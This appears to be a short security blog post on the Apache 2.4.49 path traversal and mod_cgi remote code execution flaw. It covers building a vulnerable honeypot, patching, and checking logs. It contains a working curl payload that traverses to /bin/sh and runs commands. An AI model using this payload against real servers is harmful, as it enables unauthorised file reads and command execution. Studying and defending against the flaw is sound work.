A path traversal vulnerability and exploit just dropped in the wild for a specific version of Apache (Apache/2.4.49). This vulnerability allows an unauthenticated attacker to execute a path traversal attack (and now shown RCE if MOD_CGI is enabled) to read files outside of the virtual directory path bounds. This only affects a single version of Apache, there’s a fair few of these online, however it’s very unlikely all are vulnerable. The vulnerability requires specific permissions to be configured.
How to determine the version of Apache2
From a terminal/ssh connection run:
Deploy Honeypot for specific version of Apache on Ubuntu
Ok this is a fast throw together deployment.
sudo apt-get install build-essential sudo apt install zlibc sudo apt-get install libapr1-dev libaprutil1-dev sudo apt-get install libpcre3-dev sudo apt install zlib1g zlib1g-dev wget http://www.zlib.net/zlib-1.2.11.tar.gz tar -xvf zlib-1.2.11.tar.gz cd zlib-1.2.11/ ./configure --prefix=/usr/local make sudo make install wget http://www-eu.apache.org/dist/httpd/httpd-2.4.49.tar.gz tar -xvf httpd-2.4.49.tar.gz cd httpd-2.4.49/ ./configure --prefix=/usr/local/apache2 --enable-mods-shared=all --enable-deflate --enable-proxy --enable-proxy-balancer --enable-proxy-http make sudo make install #edit /usr/local/apache2/conf sudo /usr/local/apache2/bin/apachectl start
Creating the vulnerable config
Enable MOD CGI for RCE Vuln Enablement
The following is an example of the exploit:
You will see that you can read files that the Apache context has access to. Now this changes the attack surface, so you shouldn’t be able to read /etc/shadow
But you might be able to read web config files and other insecure credentials etc.
if MOD_CGI is enabled a POST request will actually be parsed an executed:
curl –data “A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x” ‘http://127.0.0.1/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’ -vv
You can confirm this by cat /tmp/x
This was found by HackerFantastic
You can find POC’s online, Andy put together a python POC here:
There’s also a Nuceli template (thanks https://twitter.com/forgedhallpass)
tail -f /usr/local/apache2/logs/access_log
Follow the vendor guidance and update to the latest version of Apache is a good idea, also sensible to check your access logs for IOCs.
Now that’s the bare bones. We would want to deploy more for a believable honeypot with https and an actual site but I’m just knocking this up quickly. We also need to sort out backup, recovery, and log shipping so it’s not a 10 second job to make a real-life pot for deep data analysis. The path traversal vulnerability really is likely to expose application areas or provide access to username enumeration and other sensitive information disclosure that might aid an attacker target the application of other services such as SSH from what I can see. It’s still interesting and show’s vulnerabilities can easily be introduced and re-introduced into systems.
If mod_cgi is enabled and there is RCE potential that’s a much worse position to be in, this would make the vulnerability CRITICAL.